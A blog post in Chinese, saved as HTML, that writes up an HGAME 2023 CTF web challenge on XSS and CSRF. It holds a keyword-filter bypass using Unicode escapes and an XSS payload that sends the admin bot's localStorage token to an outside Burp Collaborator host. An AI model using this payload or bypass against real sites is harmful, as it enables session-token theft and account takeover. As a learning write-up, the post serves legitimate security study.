

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=dark>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/book.svg">
  <link rel="icon" href="/img/book.svg">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="ma5hr00m">
  <meta name="keywords" content="">
  
    <meta name="description" content="复现2023HGAME-Week2的一道xss注入题, 以及关联的一点csrf">
<meta property="og:type" content="article">
<meta property="og:title" content="2023 HGAME Week2 XSS&amp;CSRF">
<meta property="og:url" content="http://ma5hr00m.top/2023/01/21/2023-hgame-xss/index.html">
<meta property="og:site_name" content="ma5hr00m blog">
<meta property="og:description" content="复现2023HGAME-Week2的一道xss注入题, 以及关联的一点csrf">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2023-01-21T14:41:07.000Z">
<meta property="article:modified_time" content="2023-01-21T16:14:23.832Z">
<meta property="article:author" content="ma5hr00m">
<meta property="article:tag" content="📟CTF">
<meta name="twitter:card" content="summary_large_image">
  
  
  
  <title>2023 HGAME Week2 XSS&amp;CSRF - ma5hr00m blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"ma5hr00m.top","root":"/","version":"1.9.4","typing":{"enable":true,"typeSpeed":70,"cursorChar":"🎉","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"FeZsjaUdx00EZCfIxSxBHYhi-MdYXbMMI","app_key":"0jlXrHGbVuyj4aQOUMjt2bdi","server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  

  

  
    
  



  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>ma5hr00m</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="2023 HGAME Week2 XSS&amp;CSRF"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-01-21 22:41" pubdate>
          2023年1月21日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          3k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          34 分钟
        
      </span>
    

    
    
      
        <span id="leancloud-page-views-container" class="post-meta" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="leancloud-page-views"></span> 次
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">2023 HGAME Week2 XSS&amp;CSRF</h1>
            
            
              <div class="markdown-body">
                
                <h2 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 前言"></a>0x00 前言</h2><p>ma5hr00m打HGAME2023的时候, 遇到了一道感兴趣的题目, 感觉对xss和csrf加深了一层理解, 于是写篇博客记录一下.</p>
<p>此时的ma5hr00m还没有熟练使用<code>Yakit</code>, 所以在复现这道题目时使用的工具是<code>BurpSuite Pro</code>, 后续会用<code>Yakit</code>搭配插件进行一波复现.</p>
<br>

<h2 id="0x01-XSS-amp-CSRF"><a href="#0x01-XSS-amp-CSRF" class="headerlink" title="0x01 XSS&amp;CSRF"></a>0x01 XSS&amp;CSRF</h2><p>公式化地介绍一下xss和csrf.</p>
<blockquote>
<p><strong>xss</strong></p>
<p>跨站点脚本（也称为 XSS）是一种网络安全漏洞，允许攻击者破坏用户与易受攻击的应用程序的交互。它允许攻击者规避同源策略，该策略旨在将不同的网站彼此隔离。跨站点脚本漏洞通常允许攻击者伪装成受害用户，执行用户能够执行的任何操作，并访问用户的任何数据。如果受害用户在应用程序中具有特权访问权限，则攻击者可能能够完全控制应用程序的所有功能和数据。 </p>
<p>跨站点脚本通过操纵易受攻击的网站来工作，以便它向用户返回恶意 JavaScript。当恶意代码在受害者的浏览器中执行时，攻击者可以完全破坏他们与应用程序的交互。</p>
<p>xss的恶意代码一般指的是JavaScript, 也可以简单地理解为JavaScript注入 ( ? ).</p>
<p><a target="_blank" rel="noopener" href="https://portswigger.net/web-security/cross-site-scripting">🔗原文👈</a></p>
</blockquote>
<blockquote>
<p><strong>csrf</strong></p>
<p>跨站点请求伪造（也称为 CSRF）是一种网络安全漏洞，允许攻击者诱使用户执行他们不打算执行的操作。它允许攻击者部分规避同源策略，该策略旨在防止不同网站相互干扰。</p>
<p>在成功的 CSRF 攻击中，攻击者会导致受害用户无意中执行某个操作。例如，这可能是更改他们帐户上的电子邮件地址、更改密码或进行资金转帐。根据操作的性质，攻击者可能能够完全控制用户的帐户。如果受感染的用户在应用程序中具有特权角色，则攻击者可能能够完全控制应用程序的所有数据和功能。</p>
<p><a target="_blank" rel="noopener" href="https://portswigger.net/web-security/csrf">🔗原文👈</a></p>
</blockquote>
<p>就我个人理解来说, xss是针对用户发起的攻击, 网站携带的恶意脚本在客户端肆意妄为地窃取用户信息 ( 如常见的cookie, token ) ; 而csrf是在xss的基础上对网站本身发起的攻击, 伪装成合法用户请求执行网站的某个特定功能, 以此获得网站内部数据或者对网站进行破坏.</p>
<br>

<h2 id="0x02-HGAME2023-Designer"><a href="#0x02-HGAME2023-Designer" class="headerlink" title="0x02 HGAME2023 Designer"></a>0x02 HGAME2023 Designer</h2><p>两种做法, 一种是xss转发token, 另一种是xss打csrf访问admin接口获取token.</p>
<h3 id="XSS窃取token"><a href="#XSS窃取token" class="headerlink" title="XSS窃取token"></a>XSS窃取token</h3><p>首先进入目标页面, 打开后是一个<code>register</code>页面, 输入<code>hacker</code>后进入<code>button edit</code>页面, 写有<code>save</code>, <code>preview</code> 和 <code>share</code>三个功能.</p>
<p>一番测试后, 确定注入点为<code>Box shadow</code>属性, 通过<code>preview</code>功能可以发现该表单中的数据会直接作为<code>html code</code>执行.</p>
<p>我们可以通过添加<code>href</code>属性, 然后利用<code>javascript</code>协议注入恶意代码.</p>
<p>但在测试过程中, 尝试注入<code>alert(1)</code>时, 会发现该属性所在的<code>html</code>代码被删除, 推测存在关键词过滤.</p>
<p>根据赛方提供的附件中的<code>index.js</code>, 我们可以得知前端过滤的黑名单.</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-punctuation">[</span>/on/i<span class="hljs-punctuation">,</span> /localStorage/i<span class="hljs-punctuation">,</span> /alert/<span class="hljs-punctuation">,</span> /fetch/<span class="hljs-punctuation">,</span> /XMLHttpRequest/<span class="hljs-punctuation">,</span> /window/<span class="hljs-punctuation">,</span> /location/<span class="hljs-punctuation">,</span> /document/<span class="hljs-punctuation">]</span><br></code></pre></td></tr></table></figure>

<p>我们可以通过<code>Unicode编码</code>绕过.</p>
<p>再研究附件, 我们可以根据js代码判断flag隐藏在admin的token中.</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs js">app.<span class="hljs-title function_">post</span>(<span class="hljs-string">&quot;/user/register&quot;</span>, <span class="hljs-function">(<span class="hljs-params">req, res</span>) =&gt;</span> &#123;<br>  <span class="hljs-keyword">const</span> username = req.<span class="hljs-property">body</span>.<span class="hljs-property">username</span><br>  <span class="hljs-keyword">let</span> flag = <span class="hljs-string">&quot;hgame&#123;fake_flag_here&#125;&quot;</span><br>  <span class="hljs-keyword">if</span> (username == <span class="hljs-string">&quot;admin&quot;</span> &amp;&amp; req.<span class="hljs-property">ip</span> == <span class="hljs-string">&quot;127.0.0.1&quot;</span> || req.<span class="hljs-property">ip</span> == <span class="hljs-string">&quot;::ffff:127.0.0.1&quot;</span>) &#123;<br>    flag = <span class="hljs-string">&quot;hgame&#123;true_flag_here&#125;&quot;</span><br>  &#125;<br>  <span class="hljs-keyword">const</span> token = jwt.<span class="hljs-title function_">sign</span>(&#123; username, flag &#125;, secret)<br>  res.<span class="hljs-title function_">json</span>(&#123; token &#125;)<br>&#125;)<br></code></pre></td></tr></table></figure>

<p>当我们<code>share</code>一个<code>button</code>样式后, 会有弹窗提示<code>admin will see it later</code>, 询问出题人后, 得知会有一个<code>bot</code>模拟管理员, 间隔一段时间点击上传的按钮, hacker的目的是窃取管理员存储在<code>localStorage</code>中的<code>token</code>, 并转发到hacker的服务器上, 所以构造出以下exp.</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs js">3px 3px #<span class="hljs-number">000</span>;<span class="hljs-string">&quot;href=&quot;</span><span class="hljs-attr">javascript</span>:<br>fe\<span class="hljs-title function_">u0074ch</span>(<span class="hljs-string">&#x27;https://vpo3zoujlz48l6dnqm0w0ocl4ca2yr.burpcollaborator.net&#x27;</span>, &#123;<br><span class="hljs-attr">method</span>: <span class="hljs-string">&#x27;POST&#x27;</span>,<br><span class="hljs-attr">mode</span>: <span class="hljs-string">&#x27;no-cors&#x27;</span>,<br><span class="hljs-attr">body</span>:lo\u0063alS\u0074orage.<span class="hljs-title function_">getItem</span>(<span class="hljs-string">&#x27;token&#x27;</span>)<br>&#125;)<br></code></pre></td></tr></table></figure>

<p>稍等一段时间后, 接受数据并对<code>token</code>进行JWT分析, 得到了存储于payload中的flag.</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-punctuation">&#123;</span><br>  <span class="hljs-attr">&quot;username&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;admin&quot;</span><span class="hljs-punctuation">,</span><br>  <span class="hljs-attr">&quot;flag&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;hgame&#123;b_c4re_ab0ut_prop3rt1ty_injEctiOn&#125;&quot;</span><span class="hljs-punctuation">,</span><br>  <span class="hljs-attr">&quot;iat&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-number">1673684032</span><br><span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>

<p>BurpSuite提供了便利的<code>Collaborator Client</code>, 可以直接把信息转发到这个客户端处, 之后可以就可以接收到发送过来的<code>post</code>请求.</p>
<h3 id="XSS打CSRF窃取token"><a href="#XSS打CSRF窃取token" class="headerlink" title="XSS打CSRF窃取token"></a>XSS打CSRF窃取token</h3><p>找注入点前面都一样, 不赘述, 不同的是找到注入点之后的操作.</p>
<p>根据附件中的内容, 我们可以发现<code>share</code>之后, 浏览器渲先染页面再设置<code>jwt</code>, 再之后<code>bot</code>点击按钮.</p>
<p><code>web</code>👋都了解浏览器的基本运作流程, 渲染页面时会优先执行<code>&lt;script&gt;</code>标签内容, 这样就可以在触发恶意js脚本. 但此时, <code>localStorage</code>中还没有所需的<code>token</code>, 那我们可以想到模仿admin访问一些接口来主动获取<code>token</code>, 然后再转发给<code>hacker</code>.</p>
<p>所以, 可以构造一个exp, 模拟admin去访问<code>/user/register</code>接口, 这样就可以返回已有的<code>token</code>, 再转发到<code>hakcer</code>.</p>
<p>这就是一个xss打csrf的过程.</p>
<p>根据这个题, 我们可以稍微理解一下csrf的定位:</p>
<p>csrf是xss的进一步延伸, 在某些情况下, hacker通过传统的xss可能无法获得所需的cookie等用户数据, 这种时候就可以尝试用xss打csrf伪造身份请求一些危险的接口, 以此获得想要的数据.</p>
<br>

<h2 id="0x03-后话"><a href="#0x03-后话" class="headerlink" title="0x03 后话"></a>0x03 后话</h2><blockquote>
<p>跨越时空的新年祝福 ( x )</p>
</blockquote>
<p>这篇博客本来是20号开始写的, 但有点事耽搁了, 于是就出现了除夕夜写博客的状况.</p>
<p>直到刚刚, 码着字跨年了.</p>
<p>所以… 2023新年快乐!</p>
<p>本来想写一篇新年计划, 但觉得和之前的博客重合度有些高, 就不单独写了, 深深地印在脑海里吧.</p>
<p>反正最后的宗旨都是变得更好!</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%F0%9F%93%9FCTF/">#📟CTF</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>2023 HGAME Week2 XSS&amp;CSRF</div>
      <div>http://ma5hr00m.top/2023/01/21/2023-hgame-xss/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>ma5hr00m</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2023年1月21日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2023/01/28/LNMP%E5%BC%80%E5%8F%91%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA/" title="LAMP环境搭建">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">LAMP环境搭建</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/01/19/%E5%88%9D%E6%AC%A1%E6%8E%A2%E7%B4%A2Linux/" title="初次探索Linux">
                        <span class="hidden-mobile">初次探索Linux</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/valine/1.5.1/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"FeZsjaUdx00EZCfIxSxBHYhi-MdYXbMMI","appKey":"0jlXrHGbVuyj4aQOUMjt2bdi","path":"window.location.pathname","placeholder":null,"avatar":"retro","meta":["nick","mail"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":false,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":false},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          var imgSelector = '#valine .vcontent img:not(.vemoji)';
          Fluid.plugins.imageCaption(imgSelector);
          Fluid.plugins.fancyBox(imgSelector);
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://github.com/ma5hr00m" target="_blank" rel="nofollow noopener"><span>Copyright © 2022 ma5hr00m</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="leancloud-site-pv-container" style="display: none">
        总访问量 
        <span id="leancloud-site-pv"></span>
         次
      </span>
    
    
      <span id="leancloud-site-uv-container" style="display: none">
        总访客数 
        <span id="leancloud-site-uv"></span>
         人
      </span>
    
    

  
</div>

  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script defer src="/js/leancloud.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
